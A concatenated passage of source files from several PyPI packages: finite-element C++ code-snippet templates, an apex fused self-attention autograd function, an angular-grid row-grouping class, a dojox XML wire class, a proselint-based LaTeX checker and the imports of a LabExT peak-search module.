{
for (unsigned int num = 0; num < row; num++)
{
for (unsigned int col = %(n)s-1; col+1 > 0; col--)
{
if (%(combinations)s[row][col] + 1 > %(dimension-1)s)
%(combinations)s[row][col] = 0;
else
{
%(combinations)s[row][col] += 1;
break;
}
}
}
}"""
def _transform_snippet(tdim, gdim):
if tdim == gdim:
_t = ""
_g = ""
else:
_t = "_t"
_g = "_g"
# Matricize K_ij -> {K_ij}
matrix = "{{" + "}, {".join([", ".join(["K[%d]" % (t * gdim + g)
for g in range(gdim)])
for t in range(tdim)]) + "}};\n\n"
snippet = """\
// Compute inverse of Jacobian
const double %%(K)s[%d][%d] = %s""" % (tdim, gdim, matrix)
snippet += """// Declare transformation matrix
// Declare pointer to two dimensional array and initialise
double %%(transform)s[%%(max_g_deriv)s][%%(max_t_deriv)s];
for (unsigned int j = 0; j < %%(num_derivatives)s%(g)s; j++)
{
for (unsigned int k = 0; k < %%(num_derivatives)s%(t)s; k++)
%%(transform)s[j][k] = 1;
}
// Construct transformation matrix
for (unsigned int row = 0; row < %%(num_derivatives)s%(g)s; row++)
{
for (unsigned int col = 0; col < %%(num_derivatives)s%(t)s; col++)
{
for (unsigned int k = 0; k < %%(n)s; k++)
%%(transform)s[row][col] *= %%(K)s[%%(combinations)s%(t)s[col][k]][%%(combinations)s%(g)s[row][k]];
}
}""" % {"t": _t, "g": _g}
return snippet
# Codesnippets used in evaluate_dof
_map_onto_physical_1D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0];
const double w1 = X_%(i)d[%(j)s][0];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[1];"""
_map_onto_physical_2D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0] - X_%(i)d[%(j)s][1];
const double w1 = X_%(i)d[%(j)s][0];
const double w2 = X_%(i)d[%(j)s][1];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[2] + w2*coordinate_dofs[4];
y[1] = w0*coordinate_dofs[1] + w1*coordinate_dofs[3] + w2*coordinate_dofs[5];"""
_map_onto_physical_2D_1D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0];
const double w1 = X_%(i)d[%(j)s][0];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[2];
y[1] = w0*coordinate_dofs[1] + w1*coordinate_dofs[3];"""
_map_onto_physical_3D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0] - X_%(i)d[%(j)s][1] - X_%(i)d[%(j)s][2];
const double w1 = X_%(i)d[%(j)s][0];
const double w2 = X_%(i)d[%(j)s][1];
const double w3 = X_%(i)d[%(j)s][2];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[3] + w2*coordinate_dofs[6] + w3*coordinate_dofs[9];
y[1] = w0*coordinate_dofs[1] + w1*coordinate_dofs[4] + w2*coordinate_dofs[7] + w3*coordinate_dofs[10];
y[2] = w0*coordinate_dofs[2] + w1*coordinate_dofs[5] + w2*coordinate_dofs[8] + w3*coordinate_dofs[11];"""
_map_onto_physical_3D_1D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0];
const double w1 = X_%(i)d[%(j)s][0];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[3];
y[1] = w0*coordinate_dofs[1] + w1*coordinate_dofs[4];
y[2] = w0*coordinate_dofs[2] + w1*coordinate_dofs[5];"""
_map_onto_physical_3D_2D = """\
// Evaluate basis functions for affine mapping
const double w0 = 1.0 - X_%(i)d[%(j)s][0] - X_%(i)d[%(j)s][1];
const double w1 = X_%(i)d[%(j)s][0];
const double w2 = X_%(i)d[%(j)s][1];
// Compute affine mapping y = F(X)
y[0] = w0*coordinate_dofs[0] + w1*coordinate_dofs[3] + w2*coordinate_dofs[6];
y[1] = w0*coordinate_dofs[1] + w1*coordinate_dofs[4] + w2*coordinate_dofs[7];
y[2] = w0*coordinate_dofs[2] + w1*coordinate_dofs[5] + w2*coordinate_dofs[8];
"""
_ip_coordinates_1D = """\
X%(num_ip)d[0] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[1];"""
_ip_coordinates_2D_1D = """\
X%(num_ip)d[0] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[2];
X%(num_ip)d[1] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[1] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[3];"""
_ip_coordinates_3D_1D = """\
X%(num_ip)d[0] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[3];
X%(num_ip)d[1] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[1] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[4];
X%(num_ip)d[2] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[2] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[5];"""
_ip_coordinates_2D = """\
X%(num_ip)d[0] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[2] + %(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[4];
X%(num_ip)d[1] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[1] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[3] + %(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[5];"""
_ip_coordinates_3D_2D = """\
X%(num_ip)d[0] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[3] +\
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[6];
X%(num_ip)d[1] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[1] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[4] +\
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[7];
X%(num_ip)d[2] =\
%(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[2] +\
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[5] +\
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[8];"""
_ip_coordinates_3D = """\
X%(num_ip)d[0] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[0] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[3] + \
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[6] + \
%(name)s[%(ip)s][3]*coordinate_dofs%(restriction)s[9];
X%(num_ip)d[1] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[1] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[4] + \
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[7] + \
%(name)s[%(ip)s][3]*coordinate_dofs%(restriction)s[10];
X%(num_ip)d[2] = %(name)s[%(ip)s][0]*coordinate_dofs%(restriction)s[2] + \
%(name)s[%(ip)s][1]*coordinate_dofs%(restriction)s[5] + \
%(name)s[%(ip)s][2]*coordinate_dofs%(restriction)s[8] + \
%(name)s[%(ip)s][3]*coordinate_dofs%(restriction)s[11];"""
# Codesnippets used in evaluatebasis[|derivatives]
_map_coordinates_FIAT_interval = """\
// Get coordinates and map to the reference (FIAT) element
double X = (2.0*x[0] - coordinate_dofs[0] - coordinate_dofs[1]) / J[0];"""
_map_coordinates_FIAT_interval_in_2D = """\
// Get coordinates and map to the reference (FIAT) element
double X = 2*(std::sqrt(std::pow(x[0] - coordinate_dofs[0], 2) + std::pow(x[1] - coordinate_dofs[1], 2)) / detJ) - 1.0;"""
_map_coordinates_FIAT_interval_in_3D = """\
// Get coordinates and map to the reference (FIAT) element
double X = 2*(std::sqrt(std::pow(x[0] - coordinate_dofs[0], 2) + std::pow(x[1] - coordinate_dofs[1], 2) + std::pow(x[2] - coordinate_dofs[2], 2))/ detJ) - 1.0;"""
_map_coordinates_FIAT_triangle = """\
// Compute constants
const double C0 = coordinate_dofs[2] + coordinate_dofs[4];
const double C1 = coordinate_dofs[3] + coordinate_dofs[5];
// Get coordinates and map to the reference (FIAT) element
double X = (J[1]*(C1 - 2.0*x[1]) + J[3]*(2.0*x[0] - C0)) / detJ;
double Y = (J[0]*(2.0*x[1] - C1) + J[2]*(C0 - 2.0*x[0])) / detJ;"""
_map_coordinates_FIAT_triangle_in_3D = """\
const double b0 = coordinate_dofs[0];
const double b1 = coordinate_dofs[1];
const double b2 = coordinate_dofs[2];
// P_FFC = J^dag (p - b), P_FIAT = 2*P_FFC - (1, 1)
double X = 2*(K[0]*(x[0] - b0) + K[1]*(x[1] - b1) + K[2]*(x[2] - b2)) - 1.0;
double Y = 2*(K[3]*(x[0] - b0) + K[4]*(x[1] - b1) + K[5]*(x[2] - b2)) - 1.0;
"""
_map_coordinates_FIAT_tetrahedron = """\
// Compute constants
const double C0 = coordinate_dofs[9] + coordinate_dofs[6] + coordinate_dofs[3] - coordinate_dofs[0];
const double C1 = coordinate_dofs[10] + coordinate_dofs[7] + coordinate_dofs[4] - coordinate_dofs[1];
const double C2 = coordinate_dofs[11] + coordinate_dofs[8] + coordinate_dofs[5] - coordinate_dofs[2];
// Compute subdeterminants
const double d_00 = J[4]*J[8] - J[5]*J[7];
const double d_01 = J[5]*J[6] - J[3]*J[8];
const double d_02 = J[3]*J[7] - J[4]*J[6];
const double d_10 = J[2]*J[7] - J[1]*J[8];
const double d_11 = J[0]*J[8] - J[2]*J[6];
const double d_12 = J[1]*J[6] - J[0]*J[7];
const double d_20 = J[1]*J[5] - J[2]*J[4];
const double d_21 = J[2]*J[3] - J[0]*J[5];
const double d_22 = J[0]*J[4] - J[1]*J[3];
// Get coordinates and map to the reference (FIAT) element
double X = (d_00*(2.0*x[0] - C0) + d_10*(2.0*x[1] - C1) + d_20*(2.0*x[2] - C2)) / detJ;
double Y = (d_01*(2.0*x[0] - C0) + d_11*(2.0*x[1] - C1) + d_21*(2.0*x[2] - C2)) / detJ;
double Z = (d_02*(2.0*x[0] - C0) + d_12*(2.0*x[1] - C1) + d_22*(2.0*x[2] - C2)) / detJ;
"""
# Mappings to code snippets used by format. These dictionaries accept
# as keys: first the topological dimension, and second the geometric
# dimension.
facet_determinant = {1: {1: _facet_determinant_1D,
2: _facet_determinant_2D_1D,
3: _facet_determinant_3D_1D},
2: {2: _facet_determinant_2D,
3: _facet_determinant_3D_2D},
3: {3: _facet_determinant_3D}}
# Geometry related snippets
map_onto_physical = {1: {1: _map_onto_physical_1D,
2: _map_onto_physical_2D_1D,
3: _map_onto_physical_3D_1D},
2: {2: _map_onto_physical_2D,
3: _map_onto_physical_3D_2D},
3: {3: _map_onto_physical_3D}}
fiat_coordinate_map = {"interval": {1: _map_coordinates_FIAT_interval,
2: _map_coordinates_FIAT_interval_in_2D,
3: _map_coordinates_FIAT_interval_in_3D},
"triangle": {2: _map_coordinates_FIAT_triangle,
3: _map_coordinates_FIAT_triangle_in_3D},
"tetrahedron": {3: _map_coordinates_FIAT_tetrahedron}}
transform_snippet = {"interval": {1: _transform_snippet(1, 1),
2: _transform_snippet(1, 2),
3: _transform_snippet(1, 3)},
"triangle": {2: _transform_snippet(2, 2),
3: _transform_snippet(2, 3)},
"tetrahedron": {3: _transform_snippet(3, 3)}}
ip_coordinates = {1: {1: (3, _ip_coordinates_1D),
2: (6, _ip_coordinates_2D_1D),
3: (9, _ip_coordinates_3D_1D)},
2: {2: (10, _ip_coordinates_2D),
3: (15, _ip_coordinates_3D_2D)},
3: {3: (21, _ip_coordinates_3D)}}
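# Example (hypothetical usage): ip_coordinates is keyed the same way; each
# entry is a (size, snippet) pair, where the size value is assumed here to be
# an associated array length. The snippet's format keys are visible above:
#   _, snippet = ip_coordinates[2][3]
#   code = snippet % {"num_ip": 0, "name": "W", "ip": "ip", "restriction": ""}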
# FIXME: Rename as in compute_jacobian _compute_foo_<shape>_<n>d
normal_direction = {1: {1: _normal_direction_1D,
2: _normal_direction_2D_1D,
3: _normal_direction_3D_1D},
2: {2: _normal_direction_2D,
3: _normal_direction_3D_2D},
3: {3: _normal_direction_3D}}
facet_normal = {1: {1: _facet_normal_1D,
2: _facet_normal_2D_1D,
3: _facet_normal_3D_1D},
2: {2: _facet_normal_2D,
3: _facet_normal_3D_2D},
3: {3: _facet_normal_3D}}
cell_volume = {1: {1: _cell_volume_1D,
2: _cell_volume_2D_1D,
3: _cell_volume_3D_1D},
2: {2: _cell_volume_2D,
3: _cell_volume_3D_2D},
3: {3: _cell_volume_3D}}
circumradius = {1: {1: _circumradius_1D,
2: _circumradius_2D_1D,
3: _circumradius_3D_1D},
2: {2: _circumradius_2D,
3: _circumradius_3D_2D},
3: {3: _circumradius_3D}}
facet_area = {1: {1: _facet_area_1D,
2: _facet_area_2D_1D,
3: _facet_area_3D_1D},
2: {2: _facet_area_2D,
3: _facet_area_3D_2D},
3: {3: _facet_area_3D}}
min_facet_edge_length = {3: {3: _min_facet_edge_length_3D}}
max_facet_edge_length = {3: {3: _max_facet_edge_length_3D}}
# Code snippets for runtime quadrature (calling evaluate_basis)
eval_basis_decl = """\
std::vector<std::vector<double> > %(table_name)s(num_quadrature_points);"""
eval_basis_init = """\
for (std::size_t ip = 0; ip < num_quadrature_points; ip++)
%(table_name)s[ip].resize(%(table_size)s);"""
eval_basis = """\
// Get current quadrature point and compute values of basis functions
const double* x = quadrature_points + ip*%(gdim)s;
const double* v = coordinate_dofs + %(vertex_offset)s;
%(classname)s::_evaluate_basis_all(%(eval_name)s, x, v, cell_orientation);"""
eval_basis_copy = """\
// Copy values to table %(table_name)s
for (std::size_t i = 0; i < %(space_dim)s; i++)
%(table_name)s[ip][%(table_offset)s + i] = %(eval_name)s[%(eval_stride)s*i + %(eval_offset)s];"""
eval_derivs_decl = """\
std::vector<std::vector<double> > %(table_name)s(num_quadrature_points);"""
eval_derivs_init = """\
for (std::size_t ip = 0; ip < num_quadrature_points; ip++)
%(table_name)s[ip].resize(%(table_size)s);"""
eval_derivs = """\
// Get current quadrature point and compute values of basis function derivatives
const double* x = quadrature_points + ip*%(gdim)s;
const double* v = coordinate_dofs + %(vertex_offset)s;
%(classname)s::_evaluate_basis_derivatives_all(%(n)s, %(eval_name)s, x, v, cell_orientation);"""
eval_derivs_copy = """\
// Copy values to table %(table_name)s
for (std::size_t i = 0; i < %(space_dim)s; i++)
%(table_name)s[ip][%(table_offset)s + i] = %(eval_name)s[%(eval_stride)s*i + %(eval_offset)s];""" | PypiClean |
/CsuPTMD-1.0.12.tar.gz/CsuPTMD-1.0.12/PTMD/maskrcnn_benchmark/apex/apex/contrib/multihead_attn/fast_self_multihead_attn_func.py | import torch
import fast_self_multihead_attn
import fast_self_multihead_attn_bias
import fast_self_multihead_attn_bias_additive_mask
class FastSelfAttnFunc(torch.autograd.Function) :
@staticmethod
def forward(ctx, use_time_mask, is_training, heads, inputs, input_weights, output_weights, input_biases, output_biases, pad_mask, mask_additive, dropout_prob):
use_biases_t = torch.tensor([input_biases is not None])
heads_t = torch.tensor([heads])
dropout_prob_t = torch.tensor([dropout_prob])
null_tensor = torch.tensor([])
use_mask = (pad_mask is not None)
if use_biases_t[0]:
if not mask_additive:
input_lin_results, \
softmax_results, \
dropout_results, \
dropout_mask, \
matmul2_results, \
outputs = \
fast_self_multihead_attn_bias.forward( \
use_mask, \
use_time_mask, \
is_training, \
heads, \
inputs, \
input_weights, \
output_weights, \
input_biases, \
output_biases, \
pad_mask if use_mask else null_tensor, \
dropout_prob)
else:
input_lin_results, \
softmax_results, \
dropout_results, \
dropout_mask, \
matmul2_results, \
outputs = \
fast_self_multihead_attn_bias_additive_mask.forward( \
use_mask, \
use_time_mask, \
is_training, \
heads, \
inputs, \
input_weights, \
output_weights, \
input_biases, \
output_biases, \
pad_mask if use_mask else null_tensor, \
dropout_prob)
else:
input_lin_results, \
softmax_results, \
dropout_results, \
dropout_mask, \
matmul2_results, \
outputs = \
fast_self_multihead_attn.forward( \
use_mask, \
use_time_mask, \
is_training, \
heads, \
inputs, \
input_weights, \
output_weights, \
pad_mask if use_mask else null_tensor, \
dropout_prob)
ctx.save_for_backward(use_biases_t, \
heads_t, \
matmul2_results, \
dropout_results, \
softmax_results, \
input_lin_results, \
inputs, \
input_weights, \
output_weights, \
dropout_mask, \
dropout_prob_t)
return outputs.detach()
@staticmethod
def backward(ctx, output_grads):
use_biases_t, \
heads_t, \
matmul2_results, \
dropout_results, \
softmax_results, \
input_lin_results, \
inputs, \
input_weights, \
output_weights, \
dropout_mask, \
dropout_prob_t = ctx.saved_tensors
if use_biases_t[0]:
input_grads, \
input_weight_grads, \
output_weight_grads, \
input_bias_grads, \
output_bias_grads = \
fast_self_multihead_attn_bias.backward( \
heads_t[0], \
output_grads, \
matmul2_results, \
dropout_results, \
softmax_results, \
input_lin_results, \
inputs, \
input_weights, \
output_weights, \
dropout_mask, \
dropout_prob_t[0])
else:
input_bias_grads = None
output_bias_grads = None
input_grads, \
input_weight_grads, \
output_weight_grads = \
fast_self_multihead_attn.backward( \
heads_t[0], \
output_grads, \
matmul2_results, \
dropout_results, \
softmax_results, \
input_lin_results, \
inputs, \
input_weights, \
output_weights, \
dropout_mask, \
dropout_prob_t[0])
return None, None, None, input_grads, input_weight_grads, output_weight_grads, input_bias_grads, output_bias_grads, None, None, None
fast_self_attn_func = FastSelfAttnFunc.apply | PypiClean |
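# Minimal usage sketch (hypothetical tensors; the argument order follows
# forward() above, and the [seql, batch, embed] input layout is an assumption):
#
#   outputs = fast_self_attn_func(
#       False,                 # use_time_mask
#       True,                  # is_training
#       16,                    # heads
#       inputs,                # e.g. [seql, batch, embed]
#       input_weights, output_weights,
#       input_biases, output_biases,
#       pad_mask,
#       False,                 # mask_additive
#       0.1)                   # dropout_prob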
/Flask-Scaffold-0.5.1.tar.gz/Flask-Scaffold-0.5.1/app/templates/static/node_modules/angular-grid/src/ts/groupCreator.ts | module awk.grid {
export class GroupCreator {
private valueService: ValueService;
public init(valueService: ValueService) {
this.valueService = valueService;
}
public group(rowNodes: RowNode[], groupedCols: Column[], expandByDefault: any) {
var topMostGroup: RowNode = {
level: -1,
children: [],
_childrenMap: {}
};
var allGroups: RowNode[] = [];
allGroups.push(topMostGroup);
var levelToInsertChild = groupedCols.length - 1;
var i: number;
var currentLevel: number;
var node: RowNode;
var data: any;
var currentGroup: any;
var groupKey: string;
var nextGroup: RowNode;
// start at -1 and go backwards, as all the positive indexes
// are already used by the nodes.
var index = -1;
for (i = 0; i < rowNodes.length; i++) {
node = rowNodes[i];
data = node.data;
// all leaf nodes have the same level in this grouping, which is one level after the last group
node.level = levelToInsertChild + 1;
for (currentLevel = 0; currentLevel < groupedCols.length; currentLevel++) {
var groupColumn = groupedCols[currentLevel];
groupKey = this.valueService.getValue(groupColumn.colDef, data, node);
if (currentLevel === 0) {
currentGroup = topMostGroup;
}
// if group doesn't exist yet, create it
nextGroup = currentGroup._childrenMap[groupKey];
if (!nextGroup) {
nextGroup = {
group: true,
field: groupColumn.colId,
id: index--,
key: groupKey,
expanded: this.isExpanded(expandByDefault, currentLevel),
children: [],
// for top most level, parent is null
parent: currentGroup === topMostGroup ? null : currentGroup,
allChildrenCount: 0,
level: currentGroup.level + 1,
_childrenMap: {} //this is a temporary map, we remove at the end of this method
};
currentGroup._childrenMap[groupKey] = nextGroup;
currentGroup.children.push(nextGroup);
allGroups.push(nextGroup);
}
nextGroup.allChildrenCount++;
if (currentLevel == levelToInsertChild) {
node.parent = nextGroup === topMostGroup ? null : nextGroup;
nextGroup.children.push(node);
} else {
currentGroup = nextGroup;
}
}
}
//remove the temporary map
for (i = 0; i < allGroups.length; i++) {
delete allGroups[i]._childrenMap;
}
return topMostGroup.children;
}
isExpanded(expandByDefault: any, level: any) {
if (typeof expandByDefault === 'number') {
return level < expandByDefault;
} else {
return expandByDefault === true || expandByDefault === 'true';
}
}
}
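// Minimal usage sketch (hypothetical valueService and column objects;
// expandByDefault may be a boolean or a numeric expansion level):
//
//   var creator = new awk.grid.GroupCreator();
//   creator.init(valueService);
//   var topLevelRows = creator.group(rowNodes, [countryColumn], false);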
} | PypiClean |
/FreePyBX-1.0-RC1.tar.gz/FreePyBX-1.0-RC1/freepybx/public/js/dojox/wire/XmlWire.js.uncompressed.js | define("dojox/wire/XmlWire", ["dijit","dojo","dojox","dojo/require!dojox/xml/parser,dojox/wire/Wire"], function(dijit,dojo,dojox){
dojo.provide("dojox.wire.XmlWire");
dojo.require("dojox.xml.parser");
dojo.require("dojox.wire.Wire");
dojo.declare("dojox.wire.XmlWire", dojox.wire.Wire, {
// summary:
// A Wire for XML nodes or values (element, attribute and text)
// description:
// This class accesses XML nodes or value with a simplified XPath
// specified to 'path' property.
// The root object for this class must be an DOM document or element
// node.
// "@name" accesses to an attribute value of an element and "text()"
// accesses to a text value of an element.
// The hierarchy of the elements from the root node can be specified
// with slash-separated list, such as "a/b/@c", which specifies
// the value of an attribute named "c" of an element named "b" as
// a child of another element named "a" of a child of the root node.
_wireClass: "dojox.wire.XmlWire",
constructor: function(/*Object*/args){
// summary:
// Initialize properties
// description:
// 'args' is just mixed in with no further processing.
// args:
// Arguments to initialize properties
// path:
// A simplified XPath to an attribute, a text or elements
},
_getValue: function(/*Node*/object){
// summary:
// Return an attribute value, a text value or an array of elements
// description:
// This method first uses a root node passed in 'object' argument
// and 'path' property to identify an attribute, a text or
// elements.
// If 'path' starts with a slash (absolute), the first path
// segment is ignored, assuming it points to the root node.
// (That is, "/a/b/@c" and "b/@c" against a root node access
// the same attribute value, assuming the root node is an element
// with a tag name, "a".)
// object:
// A root node
// returns:
// A value found, otherwise 'undefined'
if(!object || !this.path){
return object; //Node
}
var node = object;
var path = this.path;
var i;
if(path.charAt(0) == '/'){ // absolute
// skip the first expression (supposed to select the top node)
i = path.indexOf('/', 1);
path = path.substring(i + 1);
}
var list = path.split('/');
var last = list.length - 1;
for(i = 0; i < last; i++){
node = this._getChildNode(node, list[i]);
if(!node){
return undefined; //undefined
}
}
var value = this._getNodeValue(node, list[last]);
return value; //String||Array
},
_setValue: function(/*Node*/object, /*String*/value){
// summary:
// Set an attribute value or a child text value to an element
// description:
// This method first uses a root node passed in 'object' argument
// and 'path' property to identify an attribute, a text or
// elements.
// If an intermediate element does not exist, it creates
// an element of the tag name in the 'path' segment as a child
// node of the current node.
// Finally, 'value' argument is set to an attribute or a text
// (a child node) of the leaf element.
// object:
// A root node
// value:
// A value to set
if(!this.path){
return object; //Node
}
var node = object;
var doc = this._getDocument(node);
var path = this.path;
var i;
if(path.charAt(0) == '/'){ // absolute
i = path.indexOf('/', 1);
if(!node){
var name = path.substring(1, i);
node = doc.createElement(name);
object = node; // to be returned as a new object
}
// skip the first expression (supposed to select the top node)
path = path.substring(i + 1);
}else{
if(!node){
return undefined; //undefined
}
}
var list = path.split('/');
var last = list.length - 1;
for(i = 0; i < last; i++){
var child = this._getChildNode(node, list[i]);
if(!child){
child = doc.createElement(list[i]);
node.appendChild(child);
}
node = child;
}
this._setNodeValue(node, list[last], value);
return object; //Node
},
_getNodeValue: function(/*Node*/node, /*String*/exp){
// summary:
// Return an attribute value, a text value or an array of elements
// description:
// If 'exp' starts with '@', an attribute value of the specified
// attribute is returned.
// If 'exp' is "text()", a child text value is returned.
// Otherwise, an array of child elements, the tag name of which
// match 'exp', is returned.
// node:
// A node
// exp:
// An expression for attribute, text or elements
// returns:
// A value found, otherwise 'undefined'
var value = undefined;
if(exp.charAt(0) == '@'){
var attribute = exp.substring(1);
value = node.getAttribute(attribute);
}else if(exp == "text()"){
var text = node.firstChild;
if(text){
value = text.nodeValue;
}
}else{ // assume elements
value = [];
for(var i = 0; i < node.childNodes.length; i++){
var child = node.childNodes[i];
if(child.nodeType === 1 /* ELEMENT_NODE */ && child.nodeName == exp){
value.push(child);
}
}
}
return value; //String||Array
},
_setNodeValue: function(/*Node*/node, /*String*/exp, /*String*/value){
// summary:
// Set an attribute value or a child text value to an element
// description:
// If 'exp' starts with '@', 'value' is set to the specified
// attribute.
// If 'exp' is "text()", 'value' is set to a child text.
// node:
// A node
// exp:
// An expression for attribute or text
// value:
// A value to set
if(exp.charAt(0) == '@'){
var attribute = exp.substring(1);
if(value){
node.setAttribute(attribute, value);
}else{
node.removeAttribute(attribute);
}
}else if(exp == "text()"){
while(node.firstChild){
node.removeChild(node.firstChild);
}
if(value){
var text = this._getDocument(node).createTextNode(value);
node.appendChild(text);
}
}
// else not supported
},
_getChildNode: function(/*Node*/node, /*String*/name){
// summary:
// Return a child node
// description:
// A child element of the tag name specified with 'name' is
// returned.
// If 'name' ends with an array index, it is used to pick up
// the corresponding element from multiple child elements.
// node:
// A parent node
// name:
// A tag name
// returns:
// A child node
var index = 1;
var i1 = name.indexOf('[');
if(i1 >= 0){
var i2 = name.indexOf(']');
index = name.substring(i1 + 1, i2);
name = name.substring(0, i1);
}
var count = 1;
for(var i = 0; i < node.childNodes.length; i++){
var child = node.childNodes[i];
if(child.nodeType === 1 /* ELEMENT_NODE */ && child.nodeName == name){
if(count == index){
return child; //Node
}
count++;
}
}
return null; //null
},
_getDocument: function(/*Node*/node){
// summary:
// Return a DOM document
// description:
// If 'node' is specified, a DOM document of the node is returned.
// Otherwise, a DOM document is created.
// returns:
// A DOM document
if(node){
return (node.nodeType == 9 /* DOCUMENT_NODE */ ? node : node.ownerDocument); //Document
}else{
return dojox.xml.parser.parse(); //Document
}
}
});
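// Minimal usage sketch (hypothetical; assumes the base dojox.wire.Wire class
// exposes getValue()/setValue() over the configured root object):
//
//   var wire = new dojox.wire.XmlWire({object: rootElement, path: "a/b/@c"});
//   var value = wire.getValue(); // attribute "c" of <b> under <a>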
}); | PypiClean |
/CheckMyTex-0.10.5.tar.gz/CheckMyTex-0.10.5/checkmytex/finding/proselint.py | import typing
import proselint.tools
from checkmytex.latex_document import LatexDocument
from .abstract_checker import Checker
from .problem import Problem
_proselint_config = {
"max_errors": 5000,
"checks": {
"airlinese.misc": True,
"annotations.misc": True,
"archaism.misc": True,
"cliches.hell": True,
"cliches.misc": True,
"consistency.spacing": False, # LaTeX does not care about spacing.
"consistency.spelling": True,
"corporate_speak.misc": True,
"cursing.filth": True,
"cursing.nfl": False,
"cursing.nword": True,
"dates_times.am_pm": True,
"dates_times.dates": True,
"hedging.misc": True,
"hyperbole.misc": True,
"jargon.misc": True,
"lexical_illusions.misc": True,
"lgbtq.offensive_terms": True,
"lgbtq.terms": True,
"links.broken": False,
"malapropisms.misc": True,
"misc.apologizing": True,
"misc.back_formations": True,
"misc.bureaucratese": True,
"misc.but": True,
"misc.capitalization": True,
"misc.chatspeak": True,
"misc.commercialese": True,
"misc.composition": True,
"misc.currency": True,
"misc.debased": True,
"misc.false_plurals": True,
"misc.illogic": True,
"misc.inferior_superior": True,
"misc.institution_name": True,
"misc.latin": True,
"misc.many_a": True,
"misc.metaconcepts": True,
"misc.metadiscourse": True,
"misc.narcissism": True,
"misc.not_guilty": True,
"misc.phrasal_adjectives": True,
"misc.preferred_forms": True,
"misc.pretension": True,
"misc.professions": True,
"misc.punctuation": True,
"misc.scare_quotes": True,
"misc.suddenly": True,
"misc.tense_present": True,
"misc.waxed": True,
"misc.whence": True,
"mixed_metaphors.misc": True,
"mondegreens.misc": True,
"needless_variants.misc": True,
"nonwords.misc": True,
"oxymorons.misc": True,
"psychology.misc": True,
"redundancy.misc": True,
"redundancy.ras_syndrome": True,
"skunked_terms.misc": True,
"spelling.able_atable": True,
"spelling.able_ible": True,
"spelling.athletes": True,
"spelling.em_im_en_in": True,
"spelling.er_or": True,
"spelling.in_un": True,
"spelling.misc": True,
"security.credit_card": True,
"security.password": True,
"sexism.misc": True,
"terms.animal_adjectives": True,
"terms.denizen_labels": True,
"terms.eponymous_adjectives": True,
"terms.venery": True,
"typography.diacritical_marks": True,
"typography.exclamation": True,
"typography.symbols": True,
"uncomparables.misc": True,
"weasel_words.misc": True,
"weasel_words.very": True,
},
}
class Proselint(Checker):
def check(self, document: LatexDocument) -> typing.Iterable[Problem]:
self.log("Running proselint...")
text = document.get_text()
suggestions = proselint.tools.lint(text, config=_proselint_config)
for suggestion in suggestions:
rule = suggestion[0]
message = suggestion[1]
origin = document.get_simplified_origin_of_text(
suggestion[4], suggestion[4] + suggestion[6]
)
context = document.get_source_context(origin)
severity = suggestion[7]
replacements = suggestion[8]
yield Problem(
origin,
f"{severity}: {message} Suggestion: {replacements}",
context=context,
long_id=f"{rule}: {context}",
rule=rule,
tool="Proselint",
)
def is_available(self) -> bool:
return True | PypiClean |
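# Minimal usage sketch (hypothetical; assumes a LatexDocument has already been
# built from the project's sources):
#
#   checker = Proselint()
#   for problem in checker.check(document):
#       print(problem)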
/LabExT_pkg-2.2.0.tar.gz/LabExT_pkg-2.2.0/LabExT/SearchForPeak/PeakSearcher.py | import json
import logging
import os
import time
from typing import Type
import numpy as np
from scipy.optimize import curve_fit
from LabExT.Measurements.MeasAPI import *
from LabExT.Movement.MotorProfiles import trapezoidal_velocity_profile_by_integration
from LabExT.Movement.MoverNew import MoverNew
from LabExT.Movement.config import CoordinateSystem
from LabExT.Movement.Transformations import StageCoordinate
from LabExT.Utils import get_configuration_file_path
from LabExT.View.Controls.PlotControl import PlotData
